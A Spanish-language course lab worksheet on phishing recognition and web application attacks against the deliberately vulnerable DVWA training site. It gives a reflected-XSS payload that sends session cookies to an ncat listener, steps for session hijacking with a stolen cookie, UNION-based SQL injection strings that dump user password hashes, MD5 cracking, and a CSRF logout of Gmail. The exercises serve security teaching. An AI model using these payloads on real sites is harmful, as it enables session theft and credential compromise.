Conceptos avanzados de Seguridad Informática

Práctica 1

1. Dados los siguientes mensajes, buscar elementos que hagan sospechar que se trata de
mensajes de phishing:

Mensaje 1:

Mensaje 2

Mensaje 3
2. Evalúe en el video de la película “9 reinas” mostrado por el docente y responda:
1. ¿Vió la película?
2. En el fragmento dado, ¿cuántas veces se realiza ingeniería social?
3. Para cada caso diga quién la hace y quién es la víctima.

3. Seguridad de aplicaciones WEB:

a) Cross Site Scripting reflejado – XSS REFLEJADO

Buscar este tipo de problema en el sitio vulnerable: http://dvwa.syper/

Acceder con el usuario “admin” y las contraseña “password” y luego ingresar a la
sección XSS reflected.

Objetivo: explotar esta vulnerabilidad para robar la sesión de un usuario válido.

Pasos a seguir para realizar el ataque:

Prueba 1: confirmar la vulnerabilidad

• Seleccione la opción XSS reflected
• En el campo de entrada ingrese:
Josefina <script> alert("Josefina")</script>
• Observe los resultados:
◦ Para confirmar la vulnerabilidad, en el navegador debería aparecer un
popup que dice: Josefina
• En el campo de entrada ingrese:
Josefina <script> alert("document.cookie)</script>
• Observe los resultados, en este caso debería aparecer un popup que
muestra el valor de la cookie.

Prueba 2: explotar la vulnerabilidad:

• Utilizar la propia VM para levantar un servicio que recolecte los datos de
sesión robados. Abra una terminal y ejecute:
◦ ncat -l 9999 -k

• Arme el script para mandar los datos de sesión a robar al servicio levantado
previamente:
Josefina <script>new Image().src="http://127.0.0.1:9999/COOKIES="+
encodeURI(document.cookie); </script>

• Observe los resultados:

◦ En el navegador debería aparecer Josefina
◦ En la terminal del atacante debería aparecer el requerimiento web que
provocó el ataque.
◦ En el requerimiento web debería aparecer la cookie de sesión robada.

◦ Prueba 3: Robar la cookie de sesión al instructor en un sitio similar al utilizado en

http://dvwa.syper/
• La vulnerabilidad se transmite al servidor a través de una variable que viaja
por GET (en la url).
• Prepare en la máquina virtual el servicio que reciba la cookie robada al
instructor.
• Copie la URL de la prueba anterior, adáptela para que la misma realice el
 requerimiento web del ataque a su PC.
• Utilice un acortador de URLs con la URL a usar en el ataque.
• Entregue la URL del ataque al docente para lograr robarle la cookie y en
consecuencia su sesión.

b) Broken Authentication and Session Management

Objetivo: Hacernos pasar por otro usuario utilizando su cookie de sesión.

Pasos a seguir para realizar el ataque:

• Las cookies de sesión se pueden robar de distintas maneras.
◦ Con XSS como en el ejercicio anterior
◦ Con sniffing

• Usando la cookie robada en el ejercicio anterior,

◦ Instalar en el navegador, el plugin para editar cookies “Cookies Manager+”
◦ Usar el plugin “Cookies Manager+” para editar la cookie de sesión utilizada
contra el sitio web dado por el instructor y configurar los valores de la cookie
robada.
◦ Verificar que se está utilizando la sesión del docente.

c) SQL injection + Sensitive Data Exposure

Buscar este tipo de problema en la la sección SQL Injection del sitio vulnerable:
http://dvwa.syper/

Objetivo: Listar todos los usuarios y contraseñas del sistema

Pasos a seguir para realizar el ataque:

Prueba 1: Confirmar la vulnerabilidad
• Vea el código fuente y determine cuales de las siguientes entradas del
usuario pueden interferir con la programación del sitio:
◦ 1
◦ 3'

Prueba 2: explotar la vulnerabilidad

• Manipule la consulta SQL para listar todos los usuarios. Inserte: 1' or '1=1.

• Obtenga todos los usuarios y los hash de sus contraseñas

Para realizar este ataque es necesario utilizar el SQL: UNION ALL
Determine la cantidad de columnas que retorna la consulta original:
▪ 1' union all select 'columna1
▪ 1' union all select 'columna1','columna2
▪ 1' union all select 'columna1','columna2','columna3
▪ …

Cuando no haya errores sabrá cual es la cantidad de columnas del

resultado del SQL al que se le quiere unir otra consulta.
• ¿Cuántas columnas tenía?

• Dado que los datos que se quieren extraer están en la tabla dvwa.users
que tiene la columna user y la columna password.
La información que se quiere extraer, se puede realizar ingresando:
◦ 1' union all select user,password from dvwa.users where '1' = '1
d) Busque en Internet sitios que permitan realizar crack online de hashes MD5.
1. Pruebe los hashes encontrados para ver si es posible deducir la contraseña.
2. Realice un reporte de las contraseñas que se crackearon.

e) CSRF:

Objetivo: Cerrar la sesión de un usuario de GMAIL

Pasos a seguir para realizar el ataque:

• Ingrese a GMAIL utilizando la Máquina Virtual dada en el curso.

(Suponga que recibió por mail un correo electrónico con una referencia a una
página web. Mediante ingeniería social lo convencen de visitarla)
• Abra otra pestaña en el navegador y visite la página http://dvwa.syper/tux.html

• Vuelva a utilizar su cuenta en GMAIL. Si el ataque funcionó, el sitio le debería

pedir que se vuelva a loguear.

• Analice el código de la página tux.html para entender qué paso.